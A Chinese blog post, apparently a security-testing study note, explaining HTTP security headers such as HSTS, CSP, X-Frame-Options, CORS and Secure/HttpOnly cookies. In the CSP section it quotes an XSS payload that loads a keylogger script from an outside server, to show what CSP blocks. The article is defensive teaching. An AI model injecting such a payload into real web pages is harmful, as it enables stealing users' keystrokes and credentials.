【安全测试学习】HTTP Header安全标志:协议级别的安全支持

最新推荐文章于 2023-04-23 20:02:29 发布
最新推荐文章于 2023-04-23 20:02:29 发布
阅读量1.2k 收藏
点赞数
分类专栏: 安全测试 文章标签: HTTP Header安全标志 安全测试 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aovenus/article/details/127398261
版权

 

1)HSTS 标志

以访问百度首页为例:

      从报文中,我们可以看到请求发出后,收到了响应 302,这意味着需要进行跳转操作。从 location 信息中,我们发现它会跳转到百度的 HTTPS 服务。     

      接着,我们看到一个发往 百度一下,你就知道 的请求报文,并且在请求报文中,配置了 Strict-Transport-Security,并且给它赋值为 max-age=172800,这意味着该配置的有效时间为 172800 秒,即 48 小时。

2)CSP标志

CSP 即 Content-Security-Policy,利用它来定义页面可以加载哪些资源。

Content-Security-Policy: script-src 'self',代表会对 JavaScript 代码的加载做一些限制,仅允许加载与 Web 页面相同来源的 JavaScript 代码。注意,这里的相同来源指的是相同的协议、域名和端口。

如:XSS 攻击实现按键记录的过程,我们需要利用如下语句加载恶意服务器上的 keylogger.js 的内容,从而实现按键记录功能。<script%20src=http://192.168.3.193/keylogger.js></script>

可如果被攻击的 Web 应用添加了上述 CSP 策略,就会导致我们的 JavaScript 代码加载失败,从而无法实现我们的攻击行为。

3)X-Frame-Options 标志

用来配置是否允许一个页面可在 <frame>、<iframe>、<embed> 或者 <object> 中展现设置的内容。

如:X-Frame-Options: DENY,DENY表示该页面不允许在 frame 等上述标签中展示任何内容。

X-Frame-Options: SAMEORIGIN ,代表仅允许在上述标签中展示与当前页面域名相同的内容。

X-Frame-Options: ALLOW-FROM uri ,代表仅允许在其中展示 uri 对应页面的内容。

如配置以上标志,则可以有效抵御广告植入。

4)Access-Control-Allow-Origin 标志

Access-Control-Allow-Origin 标志指定了该响应的资源是否被允许与给定的 origin 共享。

如:Access-Control-Allow-Origin: *,允许所有域名访问当前响应的资源

Access-Control-Allow-Origin: Example Domain,代表仅允许该域名访问当前响应的资源

Access-Control-Allow-Origin 标志可以使网站之间安全地跨域获取资源。

5)Set-Cookie 标志

Set-Cookie 标志不仅可以用来配置浏览器的 Cookie 信息,同时它还能对 Cookie 信息进行一些保护。

如:Set-Cookie: <cookie-name>=<cookie-value>; Secure; HttpOnly

在这个,写入了一个 cookie 的值,同时在后面加了两个配置项,Secure 以及 HttpOnly。其中 Secure 的作用是强制 cookie 只能在 HTTPS 环境下传递,而 HttpOnly 则可以禁止使用 JavaScript 去存取 cookie。它们都可以有效地保护 cookie 信息,防止攻击者窃取 cookie。

aovenus
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Cookie中设置了 HttpOnly,Secure 属性,有效的防止XSS攻击,X-Frame-Options 响应头避免点击劫持...
weixin_34214500的博客
12-14 2275
属性介绍: 1) secure属性当设置为true时,表示创建的 Cookie 会被以安全的形式向服务器传输(ssl),即 只能在 HTTPS 连接中被浏览器传递到服务器端进行会话验证, 如果是 HTTP 连接则不会传递该信息,所以不会被窃取到Cookie 的具体内容。 2 )HttpOnly属性如果在Cookie中设置了"HttpOnly"属性,那么通过程序(JS脚本、Applet等)...
secure_headers:使用许多安全默认值管理安全头的应用
02-01
安全标题 主分支代表6.x行。 有关如何请参阅 ,或 。 错误修复现在应该在5.x分支中进行。 gem将自动应用与安全性相关的多个标头。 这包括: 内容安全策略(CSP)-帮助检测/预防XSS,混合内容和其他类别的攻击。 HTTP严格传输安全性(HSTS)-确保浏览器从不访问网站的http版本。 防御SSLStrip / Firesheep攻击。 X-Frame-Options(XFO)-防止您的内容被框起并可能被点击劫持。 X-XSS-Protection- X-Content-Type-Options- X-Download-Options- X允许跨域策略- 推荐人政策-推荐人 Expect-CT-仅使用证书透明性日志中存在的证书。 。 Clear-Site-Data-清除浏览器数据的来源。 。 它还可以使用Secure,HttpOnly和SameSite属性标记所有http cookie。 这是默认设置,但可以使用config.cookies = SecureHeaders::OPT_OUT 。 secure_headers是一个具有全局配置,每个请求覆盖和机架
Express学习8--从服务器发送cookie给客户端
jyn15159的博客
03-19 1228
从服务器发送cookie给客户端 原生的方法 设置单个cookie: // 在node.js中,通过res.setHeader来设置响应头。 res.setHeader('set-cookie', 'name=curry'); 设置多个cookie: //在node.js中,通过res.setHeader来设置响应头。 res.setHeader('set-cookie', ['name=curry', 'age=30']); 如果cookie值是中文的话,需要对这个值进行额外的编码。 let na
4个应该被使用的HTTP安全头部标签
果芽网
05-05 2859
她是从一个构建全世界知识库的梦想而开始的,现在她不仅是全球性的知识存储库而且也是最流行最容易被部署使用的应用平台:万维网。 现在的万维网是高速的象征是由多个客户端和服务器实体共同组成庞大系统,其功能和影响不断拓展。一系列的标准促使着万维网的完善和发展。 虽然互联网带给我们非常多的好处但由于互联网自由开放的特性导致其没有一致性,没有统一应用的模型因此存在着诸多的问题。对人们影响面最广的是
网络:HTTP Cookie headerset-cookie格式及安全secure httponly
du_lijun的博客
04-07 2872
Cookie相关的Http头: 有两个Http头部和Cookie有关:Set-Cookie和Cookie。 Set-Cookie由服务器发送,它包含在响应请求的头部中。它用于在客户端创建一个Cookie。 Cookie头由客户端发送,包含在HTTP请求的头部中。注意,只有cookie的domain和path与请求的URL匹配才会发送这个cookie。 Set-Cookie HeaderSet-Cookie: <name>=<value>[;...
cookie的secure属性添加问题
baisheyuanqi的博客
09-21 6296
图片导入到excel 跟网上那些导入图片没有太多区别,但是图片的插入还是有点体会的
http安全相关的安全选项
hl1293348082的专栏
04-10 589
由于HTTP是一个可扩展的协议,各浏览器厂商都率先推出了有效的头部,来阻止漏洞利用或提高利用漏洞的难度。了解它们是什么,掌握如何应用,可以提高系统的安全性。 下面就简单介绍一下这些安全头的含义以及效果。 X-Frame-Options X-Frame-Options HTTP 响应头是用来给浏览器指示允许一个页面可否在 <frame>,<iframe> 或者 <object> 中展现的标记。网站可以使用此功能,来确保自己网站的内容没有被嵌到别人的网站中去,也从而避免了
HTTP 请求头安全方案
qq_35040959的博客
01-13 1724
HTTP 请求头安全方案
Spring安全方案—针对常见漏洞的保护(安全 HTTP 响应标头)(官方原版)
深圳市多克创新科技有限公司
04-23 555
Spring安全方案—针对常见漏洞的保护(安全 HTTP 响应标头)(官方原版)
HTTP Security Headers 说明
xgw的专栏
07-29 2927
简单说明一下相关header HTTP Security Headers的内容 X-XSS-Protection Content Security Policy HTTP Strict Transport Security(HSTS) HTTP Public Key Pinning(HPKP) X-Frame-Options X-Content-Type-Options Referer-Policy Cookie Options 1. X-XSS-Protection 用于处理跨站脚本攻击 (XSS)。 可
Web应用安全:Livehttpheader插件介绍.pptx
06-19
此外,取得对Web 应用程序流出和流入的数据的控制权不仅对Web 应用程序安全缺陷的发现和漏洞的利用等安全测试任务具有很大的帮助,而且还有利于常规的Web 应用程序测试。 Live http headers ,有了这个Firefox扩展,...
Web应用安全:Livehttpheader插件介绍.docx
06-17
Web应用安全:Livehttpheader插件介绍.docx
Web应用安全HTTP消息结构.pptx
06-18
HTTP是基于客户端/服务端(C/S)的架构模型,通过一个可靠的链接来交换信息,是一个无状态的请求/响应协议。 一个HTTP"客户端"是一个应用程序(Web浏览器或其他任何客户端),通过连接到服务器达到向服务器发送一个...
HTTP安全标头大全(X-Frame-Options,CSP,HSTS.....,,)
最新发布
10-31
HTTP安全标头大全(X-Frame-Options,CSP,HSTS.....,,) 最常见的攻击包括:钓鱼、跨站脚本(XSS)、中间人攻击(MITM,通常发生在免费公共WiFi或其他开放网络上) 所以HTTP安全头是一种良好的防火墙,可以防止许多...
HTTP协议Header头信息详解.txt
09-14
做Web开发或者做网络开发的朋友,这是必须掌握的内容,关于HttpHeader,里面携带了大量的头信息,就像你寄包裹一样,你要说明收件人...这些内容,在Http协议中是如何呈现的呢,请参考此资源详细内容,带您剖析详解。
容器安全检测工具之一:docker bench
热门推荐
aovenus的专栏-测试新时代(微信公众号:测试新时代)
02-02 1万+
docker bench 在github下载地址:GitHub - docker/docker-bench-security: The Docker Bench for Security is a script that checks for dozens of common best-practices around deploying Docker containers in production. Docker Bench是一个开源项目,该项目按照互联网安全中心(Cente...
信息系统安全等级保护基本要求——技术要求
aovenus的专栏-测试新时代(微信公众号:测试新时代)
04-20 8189
信息系统安全等级保护基本要求——技术要求   一、技术要求: 标记说明:保护数据在存储、传输、处理过程中不被泄漏、破坏和免受未授权的修改的信息安全类要求(简记为S);保护系统连续正常的运行,免受对系统的未授权修改、破坏而导致系统不可用的服务保证类要求(简记为A);通用安全保护类要求(简记为G)     基本要求 第一级 第二级 第三级
信息系统安全等级保护基本要求——管理要求
aovenus的专栏-测试新时代(微信公众号:测试新时代)
04-20 7861
二、管理要求 标记说明:保护数据在存储、传输、处理过程中不被泄漏、破坏和免受未授权的修改的信息安全类要求(简记为S);保护系统连续正常的运行,免受对系统的未授权修改、破坏而导致系统不可用的服务保证类要求(简记为A);通用安全保护类要求(简记为G)   基本要求 第一级 第二级 第三级 第四级 安全管理制度 管
安全测试发现可高速缓存的登录页面的解决方法
aovenus的专栏-测试新时代(微信公众号:测试新时代)
08-03 6139
发现可高速缓存的登录页面 【问题描述】采用IBM Appscan进行扫描测试,发现可高速缓存的登录页面,给出的修改建议为: 【解决方法】 1、首先简单了解下HTTP通用信息头中的Pragma的含义: Pragma头字段的设置值只能固定为no-cache,即Pragma:no-cache。当Pragma头字段用于响应消息时,指示HTTP1.0客户端不要缓存文档;当用于请求消息时,指示
IPec是一组什么安全协议
06-03
1. 认证头部协议(Authentication Header,AH):AH协议主要用于对IP数据包进行身份验证和完整性验证,以保证通信数据在传输过程中不被篡改或者伪造。 2. 封装安全载荷协议(Encapsulating Security Payload,ESP)...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值